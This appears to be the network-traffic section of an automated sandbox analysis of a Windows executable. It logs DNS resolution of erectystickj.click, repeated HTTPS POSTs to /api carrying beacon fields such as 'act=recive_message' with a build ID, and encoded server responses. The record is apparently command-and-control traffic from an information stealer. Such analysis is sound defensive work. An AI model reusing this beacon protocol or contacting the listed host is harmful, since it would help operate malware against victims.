Dec 26, 2024 12:08:14.186809063 CET	49719	443	192.168.2.6	172.67.154.166
Dec 26, 2024 12:08:14.187015057 CET	49719	443	192.168.2.6	172.67.154.166
Dec 26, 2024 12:08:14.187024117 CET	443	49719	172.67.154.166	192.168.2.6
Dec 26, 2024 12:08:14.187053919 CET	49719	443	192.168.2.6	172.67.154.166
Dec 26, 2024 12:08:14.187060118 CET	443	49719	172.67.154.166	192.168.2.6
Dec 26, 2024 12:08:14.354753017 CET	49725	443	192.168.2.6	172.67.154.166
Dec 26, 2024 12:08:14.354804993 CET	443	49725	172.67.154.166	192.168.2.6
Dec 26, 2024 12:08:14.354897976 CET	49725	443	192.168.2.6	172.67.154.166
Dec 26, 2024 12:08:14.355221033 CET	49725	443	192.168.2.6	172.67.154.166
Dec 26, 2024 12:08:14.355231047 CET	443	49725	172.67.154.166	192.168.2.6
Dec 26, 2024 12:08:15.669385910 CET	443	49725	172.67.154.166	192.168.2.6
Dec 26, 2024 12:08:15.669605970 CET	49725	443	192.168.2.6	172.67.154.166
Dec 26, 2024 12:08:15.671113968 CET	49725	443	192.168.2.6	172.67.154.166
Dec 26, 2024 12:08:15.671127081 CET	443	49725	172.67.154.166	192.168.2.6
Dec 26, 2024 12:08:15.671422005 CET	443	49725	172.67.154.166	192.168.2.6
Dec 26, 2024 12:08:15.672683954 CET	49725	443	192.168.2.6	172.67.154.166
Dec 26, 2024 12:08:15.672851086 CET	49725	443	192.168.2.6	172.67.154.166
Dec 26, 2024 12:08:15.672882080 CET	443	49725	172.67.154.166	192.168.2.6
Dec 26, 2024 12:08:16.517662048 CET	443	49725	172.67.154.166	192.168.2.6
Dec 26, 2024 12:08:16.517756939 CET	443	49725	172.67.154.166	192.168.2.6
Dec 26, 2024 12:08:16.520349026 CET	49725	443	192.168.2.6	172.67.154.166
Dec 26, 2024 12:08:16.520349026 CET	49725	443	192.168.2.6	172.67.154.166
Dec 26, 2024 12:08:16.611402988 CET	49734	443	192.168.2.6	172.67.154.166
Dec 26, 2024 12:08:16.611454964 CET	443	49734	172.67.154.166	192.168.2.6
Dec 26, 2024 12:08:16.611619949 CET	49734	443	192.168.2.6	172.67.154.166
Dec 26, 2024 12:08:16.611850023 CET	49734	443	192.168.2.6	172.67.154.166
Dec 26, 2024 12:08:16.611861944 CET	443	49734	172.67.154.166	192.168.2.6
Dec 26, 2024 12:08:16.820547104 CET	49725	443	192.168.2.6	172.67.154.166
Dec 26, 2024 12:08:16.820574999 CET	443	49725	172.67.154.166	192.168.2.6
Dec 26, 2024 12:08:17.915695906 CET	443	49734	172.67.154.166	192.168.2.6
Dec 26, 2024 12:08:17.916142941 CET	49734	443	192.168.2.6	172.67.154.166
Dec 26, 2024 12:08:17.917896032 CET	49734	443	192.168.2.6	172.67.154.166
Dec 26, 2024 12:08:17.917905092 CET	443	49734	172.67.154.166	192.168.2.6
Dec 26, 2024 12:08:17.918368101 CET	443	49734	172.67.154.166	192.168.2.6
Dec 26, 2024 12:08:17.919924021 CET	49734	443	192.168.2.6	172.67.154.166
Dec 26, 2024 12:08:17.920124054 CET	49734	443	192.168.2.6	172.67.154.166
Dec 26, 2024 12:08:17.920154095 CET	443	49734	172.67.154.166	192.168.2.6
Dec 26, 2024 12:08:17.920238018 CET	49734	443	192.168.2.6	172.67.154.166
Dec 26, 2024 12:08:17.963345051 CET	443	49734	172.67.154.166	192.168.2.6
Dec 26, 2024 12:08:18.816468000 CET	443	49734	172.67.154.166	192.168.2.6
Dec 26, 2024 12:08:18.816580057 CET	443	49734	172.67.154.166	192.168.2.6
Dec 26, 2024 12:08:18.816700935 CET	49734	443	192.168.2.6	172.67.154.166
Dec 26, 2024 12:08:18.817092896 CET	49734	443	192.168.2.6	172.67.154.166
Dec 26, 2024 12:08:18.817115068 CET	443	49734	172.67.154.166	192.168.2.6
Dec 26, 2024 12:08:19.040452003 CET	49740	443	192.168.2.6	172.67.154.166
Dec 26, 2024 12:08:19.040510893 CET	443	49740	172.67.154.166	192.168.2.6
Dec 26, 2024 12:08:19.040656090 CET	49740	443	192.168.2.6	172.67.154.166
Dec 26, 2024 12:08:19.041011095 CET	49740	443	192.168.2.6	172.67.154.166
Dec 26, 2024 12:08:19.041027069 CET	443	49740	172.67.154.166	192.168.2.6
Dec 26, 2024 12:08:20.350471020 CET	443	49740	172.67.154.166	192.168.2.6
Dec 26, 2024 12:08:20.350581884 CET	49740	443	192.168.2.6	172.67.154.166
Dec 26, 2024 12:08:20.352016926 CET	49740	443	192.168.2.6	172.67.154.166
Dec 26, 2024 12:08:20.352027893 CET	443	49740	172.67.154.166	192.168.2.6
Dec 26, 2024 12:08:20.352308035 CET	443	49740	172.67.154.166	192.168.2.6
Dec 26, 2024 12:08:20.353544950 CET	49740	443	192.168.2.6	172.67.154.166
Dec 26, 2024 12:08:20.353688955 CET	49740	443	192.168.2.6	172.67.154.166
Dec 26, 2024 12:08:20.353830099 CET	443	49740	172.67.154.166	192.168.2.6
Dec 26, 2024 12:08:20.353885889 CET	49740	443	192.168.2.6	172.67.154.166
Dec 26, 2024 12:08:20.353892088 CET	443	49740	172.67.154.166	192.168.2.6
Dec 26, 2024 12:08:21.352853060 CET	443	49740	172.67.154.166	192.168.2.6
Dec 26, 2024 12:08:21.352973938 CET	443	49740	172.67.154.166	192.168.2.6
Dec 26, 2024 12:08:21.353048086 CET	49740	443	192.168.2.6	172.67.154.166
Dec 26, 2024 12:08:21.353209019 CET	49740	443	192.168.2.6	172.67.154.166
Dec 26, 2024 12:08:21.353230000 CET	443	49740	172.67.154.166	192.168.2.6
Dec 26, 2024 12:08:21.662970066 CET	49751	443	192.168.2.6	172.67.154.166
Dec 26, 2024 12:08:21.663026094 CET	443	49751	172.67.154.166	192.168.2.6
Dec 26, 2024 12:08:21.663124084 CET	49751	443	192.168.2.6	172.67.154.166
Dec 26, 2024 12:08:21.663482904 CET	49751	443	192.168.2.6	172.67.154.166
Dec 26, 2024 12:08:21.663495064 CET	443	49751	172.67.154.166	192.168.2.6
Dec 26, 2024 12:08:22.967029095 CET	443	49751	172.67.154.166	192.168.2.6
Dec 26, 2024 12:08:22.967196941 CET	49751	443	192.168.2.6	172.67.154.166
Dec 26, 2024 12:08:22.974209070 CET	49751	443	192.168.2.6	172.67.154.166
Dec 26, 2024 12:08:22.974235058 CET	443	49751	172.67.154.166	192.168.2.6
Dec 26, 2024 12:08:22.974528074 CET	443	49751	172.67.154.166	192.168.2.6
Dec 26, 2024 12:08:22.975724936 CET	49751	443	192.168.2.6	172.67.154.166
Dec 26, 2024 12:08:22.975812912 CET	49751	443	192.168.2.6	172.67.154.166
Dec 26, 2024 12:08:22.975820065 CET	443	49751	172.67.154.166	192.168.2.6
Dec 26, 2024 12:08:24.095172882 CET	443	49751	172.67.154.166	192.168.2.6
Dec 26, 2024 12:08:24.095283031 CET	443	49751	172.67.154.166	192.168.2.6
Dec 26, 2024 12:08:24.095448971 CET	49751	443	192.168.2.6	172.67.154.166
Dec 26, 2024 12:08:24.095551014 CET	49751	443	192.168.2.6	172.67.154.166
Dec 26, 2024 12:08:24.095580101 CET	443	49751	172.67.154.166	192.168.2.6
Dec 26, 2024 12:08:24.827625990 CET	49757	443	192.168.2.6	172.67.154.166
Dec 26, 2024 12:08:24.827702999 CET	443	49757	172.67.154.166	192.168.2.6
Dec 26, 2024 12:08:24.827958107 CET	49757	443	192.168.2.6	172.67.154.166
Dec 26, 2024 12:08:24.828279018 CET	49757	443	192.168.2.6	172.67.154.166
Dec 26, 2024 12:08:24.828304052 CET	443	49757	172.67.154.166	192.168.2.6
Dec 26, 2024 12:08:26.133049011 CET	443	49757	172.67.154.166	192.168.2.6
Dec 26, 2024 12:08:26.133192062 CET	49757	443	192.168.2.6	172.67.154.166
Dec 26, 2024 12:08:26.170610905 CET	49757	443	192.168.2.6	172.67.154.166
Dec 26, 2024 12:08:26.170646906 CET	443	49757	172.67.154.166	192.168.2.6
Dec 26, 2024 12:08:26.171001911 CET	443	49757	172.67.154.166	192.168.2.6
Dec 26, 2024 12:08:26.222995996 CET	49757	443	192.168.2.6	172.67.154.166
Dec 26, 2024 12:08:26.521153927 CET	49757	443	192.168.2.6	172.67.154.166
Dec 26, 2024 12:08:26.521996975 CET	49757	443	192.168.2.6	172.67.154.166
Dec 26, 2024 12:08:26.522027969 CET	443	49757	172.67.154.166	192.168.2.6
Dec 26, 2024 12:08:26.522130966 CET	49757	443	192.168.2.6	172.67.154.166
Dec 26, 2024 12:08:26.522155046 CET	443	49757	172.67.154.166	192.168.2.6
Dec 26, 2024 12:08:26.522236109 CET	49757	443	192.168.2.6	172.67.154.166
Dec 26, 2024 12:08:26.522289038 CET	443	49757	172.67.154.166	192.168.2.6
Dec 26, 2024 12:08:26.522408962 CET	49757	443	192.168.2.6	172.67.154.166
Dec 26, 2024 12:08:26.522437096 CET	443	49757	172.67.154.166	192.168.2.6
Dec 26, 2024 12:08:26.522603035 CET	49757	443	192.168.2.6	172.67.154.166
Dec 26, 2024 12:08:26.522629976 CET	443	49757	172.67.154.166	192.168.2.6
Dec 26, 2024 12:08:26.522788048 CET	49757	443	192.168.2.6	172.67.154.166
Dec 26, 2024 12:08:26.522814989 CET	443	49757	172.67.154.166	192.168.2.6
Dec 26, 2024 12:08:26.522825003 CET	49757	443	192.168.2.6	172.67.154.166
Dec 26, 2024 12:08:26.522948027 CET	49757	443	192.168.2.6	172.67.154.166
Dec 26, 2024 12:08:26.522979975 CET	49757	443	192.168.2.6	172.67.154.166
Dec 26, 2024 12:08:26.567339897 CET	443	49757	172.67.154.166	192.168.2.6
Dec 26, 2024 12:08:26.567503929 CET	49757	443	192.168.2.6	172.67.154.166
Dec 26, 2024 12:08:26.567550898 CET	49757	443	192.168.2.6	172.67.154.166
Dec 26, 2024 12:08:26.567569971 CET	49757	443	192.168.2.6	172.67.154.166
Dec 26, 2024 12:08:26.615338087 CET	443	49757	172.67.154.166	192.168.2.6
Dec 26, 2024 12:08:26.615510941 CET	49757	443	192.168.2.6	172.67.154.166
Dec 26, 2024 12:08:26.615567923 CET	49757	443	192.168.2.6	172.67.154.166
Dec 26, 2024 12:08:26.615601063 CET	49757	443	192.168.2.6	172.67.154.166
Dec 26, 2024 12:08:26.663336039 CET	443	49757	172.67.154.166	192.168.2.6
Dec 26, 2024 12:08:26.663475037 CET	49757	443	192.168.2.6	172.67.154.166
Dec 26, 2024 12:08:26.707345963 CET	443	49757	172.67.154.166	192.168.2.6
Dec 26, 2024 12:08:26.707401037 CET	49757	443	192.168.2.6	172.67.154.166
Dec 26, 2024 12:08:26.707418919 CET	443	49757	172.67.154.166	192.168.2.6
Dec 26, 2024 12:08:26.883018970 CET	443	49757	172.67.154.166	192.168.2.6
Dec 26, 2024 12:08:28.988615990 CET	443	49757	172.67.154.166	192.168.2.6
Dec 26, 2024 12:08:28.988719940 CET	443	49757	172.67.154.166	192.168.2.6
Dec 26, 2024 12:08:28.988833904 CET	49757	443	192.168.2.6	172.67.154.166
Dec 26, 2024 12:08:29.022380114 CET	49757	443	192.168.2.6	172.67.154.166
Dec 26, 2024 12:08:29.022422075 CET	443	49757	172.67.154.166	192.168.2.6
Dec 26, 2024 12:08:29.598977089 CET	49768	443	192.168.2.6	172.67.154.166
Dec 26, 2024 12:08:29.599021912 CET	443	49768	172.67.154.166	192.168.2.6
Dec 26, 2024 12:08:29.599117994 CET	49768	443	192.168.2.6	172.67.154.166
Dec 26, 2024 12:08:29.599498987 CET	49768	443	192.168.2.6	172.67.154.166
Dec 26, 2024 12:08:29.599509954 CET	443	49768	172.67.154.166	192.168.2.6
Dec 26, 2024 12:08:30.908241034 CET	443	49768	172.67.154.166	192.168.2.6
Dec 26, 2024 12:08:30.912447929 CET	49768	443	192.168.2.6	172.67.154.166
Dec 26, 2024 12:08:30.912447929 CET	49768	443	192.168.2.6	172.67.154.166
Dec 26, 2024 12:08:30.912497997 CET	443	49768	172.67.154.166	192.168.2.6
Dec 26, 2024 12:08:30.912767887 CET	443	49768	172.67.154.166	192.168.2.6
Dec 26, 2024 12:08:30.914164066 CET	49768	443	192.168.2.6	172.67.154.166
Dec 26, 2024 12:08:30.914176941 CET	49768	443	192.168.2.6	172.67.154.166
Dec 26, 2024 12:08:30.914227009 CET	443	49768	172.67.154.166	192.168.2.6
Dec 26, 2024 12:08:31.742090940 CET	443	49768	172.67.154.166	192.168.2.6
Dec 26, 2024 12:08:31.742141008 CET	443	49768	172.67.154.166	192.168.2.6
Dec 26, 2024 12:08:31.742228985 CET	49768	443	192.168.2.6	172.67.154.166
Dec 26, 2024 12:08:31.742244959 CET	443	49768	172.67.154.166	192.168.2.6
Dec 26, 2024 12:08:31.742384911 CET	443	49768	172.67.154.166	192.168.2.6
Dec 26, 2024 12:08:31.742414951 CET	443	49768	172.67.154.166	192.168.2.6
Dec 26, 2024 12:08:31.742423058 CET	49768	443	192.168.2.6	172.67.154.166
Dec 26, 2024 12:08:31.742429018 CET	443	49768	172.67.154.166	192.168.2.6
Dec 26, 2024 12:08:31.742461920 CET	49768	443	192.168.2.6	172.67.154.166
Dec 26, 2024 12:08:31.750361919 CET	443	49768	172.67.154.166	192.168.2.6
Dec 26, 2024 12:08:31.758785963 CET	443	49768	172.67.154.166	192.168.2.6
Dec 26, 2024 12:08:31.758825064 CET	443	49768	172.67.154.166	192.168.2.6
Dec 26, 2024 12:08:31.758867025 CET	49768	443	192.168.2.6	172.67.154.166
Dec 26, 2024 12:08:31.758888006 CET	443	49768	172.67.154.166	192.168.2.6
Dec 26, 2024 12:08:31.758932114 CET	49768	443	192.168.2.6	172.67.154.166
Dec 26, 2024 12:08:31.767400026 CET	443	49768	172.67.154.166	192.168.2.6
Dec 26, 2024 12:08:31.775449991 CET	443	49768	172.67.154.166	192.168.2.6
Dec 26, 2024 12:08:31.775516033 CET	49768	443	192.168.2.6	172.67.154.166
Dec 26, 2024 12:08:31.775527000 CET	443	49768	172.67.154.166	192.168.2.6
Dec 26, 2024 12:08:31.775600910 CET	49768	443	192.168.2.6	172.67.154.166
Dec 26, 2024 12:08:31.775790930 CET	49768	443	192.168.2.6	172.67.154.166
Dec 26, 2024 12:08:31.775810957 CET	443	49768	172.67.154.166	192.168.2.6
Dec 26, 2024 12:08:31.775830984 CET	49768	443	192.168.2.6	172.67.154.166
Dec 26, 2024 12:08:31.775836945 CET	443	49768	172.67.154.166	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 26, 2024 12:08:09.463785887 CET	60443	53	192.168.2.6	1.1.1.1
Dec 26, 2024 12:08:09.767463923 CET	53	60443	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 26, 2024 12:08:09.463785887 CET	192.168.2.6	1.1.1.1	0xef6d	Standard query (0)	erectystickj.click	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 26, 2024 12:08:09.767463923 CET	1.1.1.1	192.168.2.6	0xef6d	No error (0)	erectystickj.click		172.67.154.166	A (IP address)	IN (0x0001)	false
Dec 26, 2024 12:08:09.767463923 CET	1.1.1.1	192.168.2.6	0xef6d	No error (0)	erectystickj.click		104.21.5.142	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

erectystickj.click

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49713	172.67.154.166	443	4040	C:\Users\user\Desktop\RIMz2N1u5y.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-26 11:08:11 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: erectystickj.click
2024-12-26 11:08:11 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-26 11:08:11 UTC	1129	IN	HTTP/1.1 200 OK Date: Thu, 26 Dec 2024 11:08:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=pdvvedicopg4rl48hgt56tdpmm; expires=Mon, 21 Apr 2025 04:54:50 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fBByp7djsqxAfpeeoYRc99qnLPzk1%2FioVFggGhzOYYmD4AZPEaAtUnGh1mdOteXWN6xBeW7bCR6prRCi0SA%2FpSgzbuS2PfpGCmzodXitbzmJ1J7oMQE%2FsdmGiHdSfsSFUX%2FdDZE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f809c8b1f957d0c-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1956&min_rtt=1951&rtt_var=743&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=909&delivery_rate=1461461&cwnd=156&unsent_bytes=0&cid=6610b6fe9275e535&ts=786&x=0"
2024-12-26 11:08:11 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-26 11:08:11 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49719	172.67.154.166	443	4040	C:\Users\user\Desktop\RIMz2N1u5y.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-26 11:08:13 UTC	266	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 52 Host: erectystickj.click
2024-12-26 11:08:13 UTC	52	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 61 75 36 4e 61 2d 2d 38 30 38 38 34 34 31 33 37 38 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=yau6Na--8088441378&j=
2024-12-26 11:08:13 UTC	1135	IN	HTTP/1.1 200 OK Date: Thu, 26 Dec 2024 11:08:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=1l4uksikof0sdaafa16ec6e6hf; expires=Mon, 21 Apr 2025 04:54:52 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HWxccOji%2F4mm5c1g6DMHUT%2FcUSFgIHcJ14J66%2FMNGkZHUqKpDLsHOYf7NqWSWIiwF93usFDGZzF%2BBdE%2Fq4xxUthv5Q%2FCfnn1oIrUJ74raskGjuxPFiePMGsJsK5D0bStQS%2FquCI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f809c9838114277-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2510&min_rtt=2502&rtt_var=956&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=954&delivery_rate=1134862&cwnd=191&unsent_bytes=0&cid=dff841a59ee57343&ts=787&x=0"
2024-12-26 11:08:13 UTC	234	IN	Data Raw: 31 63 61 63 0d 0a 70 45 67 64 6d 48 74 74 71 33 6a 6e 35 4a 39 76 66 74 4f 63 4a 71 5a 2b 43 67 63 71 39 59 43 44 56 74 4e 51 51 62 47 72 50 56 66 66 61 6d 75 36 51 56 6d 48 57 70 53 42 76 56 55 4b 6f 65 6c 44 69 6c 78 72 59 77 6a 50 35 75 49 36 6f 44 56 74 6b 39 31 51 64 5a 34 75 66 50 51 49 43 49 64 61 67 70 79 39 56 53 57 6f 76 6b 50 49 58 44 41 6c 54 35 2f 69 34 6a 71 78 4d 53 72 65 32 31 45 30 7a 43 52 36 38 42 34 4f 7a 78 6d 4c 69 66 6f 4b 47 37 4c 32 53 4d 38 54 59 6d 6f 49 32 61 4c 6d 4c 50 46 71 59 2f 7a 4f 53 54 62 70 4b 57 37 7a 57 52 43 48 41 38 57 42 38 55 31 45 38 66 31 44 78 42 4a 73 59 30 47 64 36 4f 73 79 73 44 51 72 77 63 4a 62 50 38 77 71 65 66 45 55 42 39 73 55 67 59 37 78 Data Ascii: 1cacpEgdmHttq3jn5J9vftOcJqZ+Cgcq9YCDVtNQQbGrPVffamu6QVmHWpSBvVUKoelDilxrYwjP5uI6oDVtk91QdZ4ufPQICIdagpy9VSWovkPIXDAlT5/i4jqxMSre21E0zCR68B4OzxmLifoKG7L2SM8TYmoI2aLmLPFqY/zOSTbpKW7zWRCHA8WB8U1E8f1DxBJsY0Gd6OsysDQrwcJbP8wqefEUB9sUgY7x
2024-12-26 11:08:13 UTC	1369	IN	Data Raw: 44 42 47 79 76 67 71 45 47 33 41 6c 45 4e 65 78 30 7a 65 67 49 7a 62 65 32 56 6c 31 32 57 52 6d 75 68 34 44 69 55 4c 46 6a 76 45 44 47 62 4c 78 51 38 55 63 65 6d 70 49 6c 4f 72 70 4d 4c 73 39 4c 4e 7a 48 56 54 4c 4f 49 33 6a 31 48 67 66 50 46 59 62 47 73 30 30 62 71 62 34 63 68 44 78 34 5a 6b 75 44 37 2f 42 30 72 6e 77 36 6b 38 35 54 64 5a 35 71 65 66 51 59 41 73 6b 49 6a 59 33 32 43 41 36 36 39 30 6e 4a 48 47 56 76 52 35 54 69 35 6a 36 37 50 53 6e 58 78 46 49 7a 78 69 6f 2f 74 46 6b 49 30 56 72 64 78 74 34 49 44 4c 62 79 55 6f 59 6d 4b 48 6f 47 6a 71 4c 6d 4f 50 46 71 59 39 76 4d 58 44 62 4e 4a 58 7a 79 45 68 33 4a 43 49 4f 4c 2b 42 38 61 74 50 42 4f 78 77 35 69 61 30 36 55 36 2b 6f 39 74 44 55 6e 6b 34 63 66 4d 74 35 71 4a 37 6f 34 41 73 49 57 6a 35 48 Data Ascii: DBGyvgqEG3AlENex0zegIzbe2Vl12WRmuh4DiULFjvEDGbLxQ8UcempIlOrpMLs9LNzHVTLOI3j1HgfPFYbGs00bqb4chDx4ZkuD7/B0rnw6k85TdZ5qefQYAskIjY32CA6690nJHGVvR5Ti5j67PSnXxFIzxio/tFkI0Vrdxt4IDLbyUoYmKHoGjqLmOPFqY9vMXDbNJXzyEh3JCIOL+B8atPBOxw5ia06U6+o9tDUnk4cfMt5qJ7o4AsIWj5H
2024-12-26 11:08:13 UTC	1369	IN	Data Raw: 2b 78 45 79 41 35 6b 62 30 36 59 37 2b 31 30 2f 33 49 6b 79 34 6b 48 64 65 77 70 61 2f 6b 54 54 66 77 5a 69 34 6a 36 47 31 79 75 73 46 32 45 47 32 51 6c 45 4e 66 76 34 44 79 33 49 43 7a 65 79 6c 45 37 79 53 39 77 38 68 6b 50 78 42 2b 42 6a 66 59 4f 45 62 58 73 54 73 51 55 62 57 52 43 6e 61 4b 76 64 4c 59 71 59 34 75 4a 62 69 4c 4e 61 45 72 35 46 77 48 4f 44 4d 57 5a 73 78 52 63 74 76 49 45 6e 46 78 6c 62 55 32 53 37 65 41 2b 76 7a 63 70 33 38 46 52 4e 74 51 6c 65 2f 6f 56 42 38 4d 58 69 34 4c 31 42 42 65 36 2b 45 54 46 46 69 67 72 43 4a 44 36 6f 57 7a 78 42 69 54 66 78 46 42 33 38 79 6c 78 39 42 34 5a 69 51 58 4c 6e 37 30 4b 45 50 47 6d 42 4d 67 56 61 47 35 43 6b 2b 4c 6d 4f 62 51 78 4a 4e 44 45 57 44 2f 49 4c 58 76 32 45 41 4c 50 47 6f 4b 43 2b 42 38 5a Data Ascii: +xEyA5kb06Y7+10/3Iky4kHdewpa/kTTfwZi4j6G1yusF2EG2QlENfv4Dy3ICzeylE7yS9w8hkPxB+BjfYOEbXsTsQUbWRCnaKvdLYqY4uJbiLNaEr5FwHODMWZsxRctvIEnFxlbU2S7eA+vzcp38FRNtQle/oVB8MXi4L1BBe6+ETFFigrCJD6oWzxBiTfxFB38ylx9B4ZiQXLn70KEPGmBMgVaG5Ck+LmObQxJNDEWD/ILXv2EALPGoKC+B8Z
2024-12-26 11:08:13 UTC	1369	IN	Data Raw: 38 70 5a 6e 4d 49 69 4b 7a 34 64 4c 59 2b 59 34 75 4a 56 6a 7a 55 4a 48 48 7a 46 41 6e 42 48 59 75 4c 39 67 73 58 74 76 6c 43 79 52 52 6c 59 45 75 57 35 75 73 6d 73 6a 6b 70 33 73 4d 66 65 34 59 74 5a 37 70 42 54 2b 34 57 72 4a 62 6d 48 77 72 78 34 51 72 64 58 47 39 70 43 4d 2b 69 34 6a 75 34 50 53 76 62 78 6c 41 78 79 43 78 35 39 78 77 41 77 77 69 4e 69 50 41 47 45 37 72 73 52 4d 6b 59 5a 47 46 41 6e 4f 69 68 65 76 45 31 4f 35 4f 52 48 77 44 4c 4a 58 2f 35 44 30 2f 57 56 4a 7a 47 2b 67 46 63 36 62 35 49 79 68 78 6e 61 55 53 63 36 75 41 34 76 7a 55 6d 32 73 46 58 4a 38 63 75 64 2f 73 58 41 4d 67 65 67 49 50 35 43 68 69 33 38 51 53 4b 58 47 39 39 43 4d 2b 69 7a 68 4f 45 63 41 4c 70 69 55 42 37 33 32 70 34 39 6c 6c 58 69 52 61 47 69 76 55 43 47 72 6a 79 54 Data Ascii: 8pZnMIiKz4dLY+Y4uJVjzUJHHzFAnBHYuL9gsXtvlCyRRlYEuW5usmsjkp3sMfe4YtZ7pBT+4WrJbmHwrx4QrdXG9pCM+i4ju4PSvbxlAxyCx59xwAwwiNiPAGE7rsRMkYZGFAnOihevE1O5ORHwDLJX/5D0/WVJzG+gFc6b5IyhxnaUSc6uA4vzUm2sFXJ8cud/sXAMgegIP5Chi38QSKXG99CM+izhOEcALpiUB732p49llXiRaGivUCGrjyT
2024-12-26 11:08:13 UTC	1369	IN	Data Raw: 76 51 35 50 68 35 54 47 2b 4d 79 4c 56 32 31 67 38 31 43 52 79 39 52 45 48 77 42 75 42 67 2f 41 4c 45 4c 76 2f 51 38 6f 53 59 43 55 47 31 2b 58 35 64 4f 6c 79 41 73 50 53 54 53 50 4c 43 33 4c 31 57 52 43 48 41 38 57 42 38 55 31 45 38 66 64 57 77 42 46 36 62 45 2b 5a 37 65 49 6d 73 44 38 6f 77 63 35 51 4d 63 45 6d 65 66 55 66 44 73 77 51 69 59 48 34 42 68 4f 39 76 67 71 45 47 33 41 6c 45 4e 66 4d 36 69 65 6d 4d 53 33 59 33 30 52 31 32 57 52 6d 75 68 34 44 69 55 4c 46 68 66 59 47 47 4c 48 79 52 4d 41 52 61 48 64 48 6b 4f 58 6f 50 36 4d 34 4a 4e 54 43 56 7a 37 4a 4c 47 33 32 46 78 33 4d 43 4a 66 47 73 30 30 62 71 62 34 63 68 43 70 76 64 56 69 55 6f 4e 41 69 73 69 51 6f 33 73 55 66 4b 6f 67 7a 50 2f 30 56 54 35 46 61 67 34 6e 30 44 68 4f 77 39 30 6a 4a 47 57 Data Ascii: vQ5Ph5TG+MyLV21g81CRy9REHwBuBg/ALELv/Q8oSYCUG1+X5dOlyAsPSTSPLC3L1WRCHA8WB8U1E8fdWwBF6bE+Z7eImsD8owc5QMcEmefUfDswQiYH4BhO9vgqEG3AlENfM6iemMS3Y30R12WRmuh4DiULFhfYGGLHyRMARaHdHkOXoP6M4JNTCVz7JLG32Fx3MCJfGs00bqb4chCpvdViUoNAisiQo3sUfKogzP/0VT5Fag4n0DhOw90jJGW
2024-12-26 11:08:13 UTC	1369	IN	Data Raw: 32 75 6f 36 67 7a 45 34 6b 39 59 52 4c 49 59 74 63 37 70 42 54 38 6f 64 68 6f 66 33 42 42 43 2b 2b 55 44 57 46 6d 39 33 53 5a 62 70 37 44 69 78 50 79 37 5a 79 46 59 34 79 69 64 34 2f 52 59 4b 69 56 54 46 67 65 56 4e 52 50 48 66 53 63 38 51 4d 7a 38 49 69 4b 7a 34 64 4c 59 2b 59 34 75 4a 58 7a 2f 44 49 48 4c 35 46 67 7a 62 47 34 4f 55 2f 51 41 57 6f 2f 52 50 77 52 46 6c 61 45 75 52 35 4f 6f 34 6f 7a 73 6a 30 4d 49 66 65 34 59 74 5a 37 70 42 54 2b 6f 4e 6b 34 7a 36 41 51 71 36 2f 30 66 53 45 58 67 6c 42 74 66 7a 35 69 58 78 61 6a 58 44 33 6c 67 71 69 44 4d 2f 2f 52 56 50 6b 56 71 44 6a 2f 73 4b 47 72 2f 73 51 63 49 54 5a 32 78 42 6b 2b 72 69 4e 4c 55 32 4a 4e 62 4b 55 7a 37 42 4b 58 44 2b 45 41 48 41 46 63 58 49 76 51 6f 45 38 61 59 45 35 51 64 72 61 55 58 Data Ascii: 